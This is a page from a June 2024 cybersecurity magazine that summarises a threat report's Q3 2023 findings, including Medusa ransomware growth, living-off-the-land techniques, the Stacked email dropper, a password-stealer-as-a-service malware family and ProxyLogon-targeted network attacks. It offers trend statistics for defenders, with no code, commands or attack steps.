Page 120 - Cyber Defense eMagazine June 2024
P. 120
Among the key findings, Internet Security Report featuring data from Q3 2023 showed:
• Threat actors increasingly use remote management tools and software to evade anti-
malware detection. This trend has also been noted by both the FBI and CISA. For instance, in
researching the top phishing domains, the Threat Lab observed a tech support scam that would
result in a victim downloading a pre-configured, unauthorized version of TeamViewer, which
would allow an attacker full remote access to their computer.
• Medusa ransomware variant surges in Q3, driving endpoint ransomware attacks to
increase 89%. On the surface, endpoint ransomware detections appeared down in Q3. Yet the
Medusa ransomware variant, which emerged in the Top 10 malware threats for the first time, was
detected with a generic signature from the Threat Lab’s automated signature engine. When
factoring in the Medusa detections, ransomware attacks rose 89% quarter over quarter.
• Threat actors pivot from using script-based attacks and increasingly employ other living-
off-the-land techniques. Malicious scripts declined as an attack vector by 11% in Q3 after
dropping by 41% in Q2. Still, script-based attacks remain the largest attack vector, accounting for
56% of total attacks, and scripting languages like PowerShell are often used in living-off-the-land
attacks. At the same time, Windows living-off-the-land binaries increased 32%. These findings
indicate to Threat Lab researchers that threat actors continue to utilize multiple living-off-the-land
techniques, likely in response to more protections around PowerShell and other scripting. Living-
off-the-land attacks make up the most endpoint attacks.
• Malware arriving over encrypted connections declined to 48%, meaning just under half of all
malware detected came via encrypted traffic. This figure is notable because it is down
considerably from previous quarters. Overall, total malware detections increased by 14%.
• An email-based dropper family that delivers malicious payloads comprised four of the Top
5 encrypted malware detections in Q3. All but one of the variants in the Top 5 contained the
dropper family named Stacked, which arrives as an attachment in an email spear phishing
attempt. Threat actors will send emails with malicious attachments that appear to come from a
known sender and claim to include an invoice or important document for review, aiming to trick
end users into downloading malware. Two of the Stacked variants – Stacked.1.12 and
Stacked.1.7 – also appeared in the Top 10 malware detections.
• Commoditized malware emerges. Among the top malware threats, a new malware family,
Lazy.360502, made the Top 10 list. It delivers the adware variant 2345explorer as well as the
Vidar password stealer. This malware threat connected to a Chinese website that provided a
credential stealer and appeared to operate like a “password stealer as a service,” where threat
actors could pay for stolen credentials, illustrating how commoditized malware is being used.
• Network attacks saw a 16% increase in Q3. ProxyLogon was the number-one vulnerability
targeted in network attacks, comprising 10% of all network detections in total.
Cyber Defense eMagazine – June 2024 Edition 120
Copyright © 2024, Cyber Defense Magazine. All rights reserved worldwide.
